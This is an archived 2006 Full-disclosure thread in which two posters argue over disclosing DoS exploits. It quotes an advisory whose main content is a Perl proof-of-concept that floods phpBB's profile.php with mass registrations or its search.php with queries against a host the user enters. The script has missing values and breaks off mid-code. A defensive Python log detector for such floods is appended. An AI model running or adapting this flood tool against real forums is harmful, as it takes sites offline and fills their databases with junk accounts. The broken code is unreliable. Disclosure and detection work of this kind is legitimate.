RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

2006-01-26 Thread Edward Pearson



No, I do believe full-disclosure to be the best method. In the case of DoS attacks, I think a point should be made of making sure the vendor is informed, and a patch available, before disclosure; then I believe it's down to the author's discretion when he releases the exploit, even if it's a PoC.
  

From: poo [mailto:[EMAIL PROTECTED]]
Sent: 26 January 2006 11:31
To: Edward Pearson
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

So what you're saying is that DoS exploits shouldn't be disclosed?

On 1/25/06, Edward Pearson <[EMAIL PROTECTED]> wrote:

  The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parents' basement and call themselves "h4x0rz".
    
  
  
  

Re: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

2006-01-26 Thread poo
So what you're saying is that DoS exploits shouldn't be disclosed?
On 1/25/06, Edward Pearson <[EMAIL PROTECTED]> wrote:

The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parents' basement and call themselves "h4x0rz".

  




RE: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

2006-01-25 Thread Edward Pearson



The less said about DoS attacks the better. A tactic mostly employed by asexual teenagers who live in their parents' basement and call themselves "h4x0rz".
  



From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of h4cky0u
Sent: 25 January 2006 14:44
To: full-disclosure@lists.grok.org.uk
Cc: bugtraq@securityfocus.com
Subject: [Full-disclosure] HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability

--  HYSA-2006-001 h4cky0u.org Advisory 010
--
Date - Wed Jan 25 2006

TITLE:
phpBB 2.0.19 search.php and profile.php DOS Vulnerability

SEVERITY:
High

SOFTWARE:
phpBB 2.0.19 and prior

INFO:
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Support Website : http://www.phpbb.com

BUG DESCRIPTION:
The bug was originally found by HaCkZaTaN of NeoSecurityteam. The original exploit code can be found at - http://h4cky0u.org/viewtopic.php?t=637
This one affected only versions up until phpBB 2.0.15. The exploit code has been recoded so that it affects the latest version too. The bug resides in the following two scripts -
profile.php << By registering as many users as you can.
search.php  << By searching in a way that the db cannot understand.

Proof Of Concept Code:
#!/usr/bin/perl
###
##   Recoded by: mix2mix and Elioni of http://ahg-khf.org
##   And h4cky0u Security Forums (http://h4cky0u.org)
##   Name: phpBBDoSReloaded
##   Original Author: HaCkZaTaN of Neo Security Team
##   Tested on phpBB 2.0.19 and earlier versions
##   Ported to perl by g30rg3_x
##   Date: 25/01/06
###

use IO::Socket;

## Initialized X
$x = 0;
print q(
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN
  Recoded by Albanian Hackers Group & h4cky0u Security Forums
);
print q(Host |without-> http://www.| );
$host = ;
chop ($host);
print q(Path |example-> /phpBB2/ or /| );
$pth = ;
chop ($pth);
print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If Visual Confirmation is enabled| );
$type = ;
chop ($type);

## Registration type
if($type == 1){
  ## User Loop for  loops (enough for Flood x)
  while($x != ) {
    ## Member that gets registered automatically as "X"
    $uname = "username=AHG__" . "$x";
    ## E-mail that gets registered in the database as "X"
    $umail = "&email=AHG__" . "$x";
    $postit = "$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
    $lrg = length $postit;
    my $sock = new IO::Socket::INET (
      PeerAddr => "$host",
      PeerPort => "80",
      Proto    => "tcp",
    );
    die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk egziston: $!\n" unless $sock;
    ## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums
    print $sock "POST $pth"."profile.php HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "Accept-Encoding: gzip, deflate\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Connection: Keep-Alive\n";
    print $sock "Cache-Control: no-cache\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    close($sock);
    ## Print a "+" for every loop
    syswrite STDOUT, "+";
    $x++;
  }

## Type 2 for Search (Flood)
} elsif ($type == 2){
  while($x != ) {
    ## Final Search String to Send
    $postit = "search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
    ## Posit Length
    $lrg = length $postit;
    ## Connect Socket with Variables Provided By User
    my $sock = new IO::Socket::INET (
      PeerAddr => "$host",
      PeerPort => "80",
      Proto    => "tcp",
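A defender-side counterpart to the two vectors the advisory names, added here as an example (it is not part of the advisory, the PoC, or any message in this thread): a sliding-window counter over Apache combined-log lines that flags any client sending an abnormal number of POSTs to profile.php or search.php, which is what both floods look like from the web server's side. The log lines, client addresses, threshold and window size are constructed for the example.

```python
# Added example, not from the advisory: flag clients whose POST rate to the
# two phpBB scripts named in HYSA-2006-001 exceeds a threshold in a window.
import re
from collections import defaultdict, deque
from datetime import datetime

WATCHED = ("/profile.php", "/search.php")   # scripts the advisory names
THRESHOLD = 10   # POSTs per client per script before we flag (assumed)
WINDOW = 60      # seconds (assumed)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)')

def parse_line(line):
    """Return (ip, epoch_seconds, method, path-without-query) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?", 1)[0]

def find_floods(lines, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of POSTs per (client, script); returns
    {ip: peak count} for clients that exceeded `threshold` within `window` s."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, method, path = parsed
        if method != "POST" or not path.endswith(WATCHED):
            continue
        q = recent[(ip, path)]
        q.append(ts)
        while ts - q[0] > window:      # drop requests older than the window
            q.popleft()
        if len(q) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged

# Constructed sample log: one client POSTs 12 registrations to profile.php in
# 22 seconds (mode=register travels in the body, so only the path is logged);
# another client browses normally and runs a single search.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jan/2006:14:44:%02d +0000] "POST /phpBB2/profile.php HTTP/1.1" 200 512'
    % (2 * i) for i in range(12)
] + [
    '203.0.113.5 - - [25/Jan/2006:14:44:10 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 8120',
    '203.0.113.5 - - [25/Jan/2006:14:44:30 +0000] "POST /phpBB2/search.php HTTP/1.1" 200 4021',
]
```

On the constructed sample, `find_floods(SAMPLE_LOG)` returns `{"198.51.100.7": 12}`; the single search from the other client stays under the threshold.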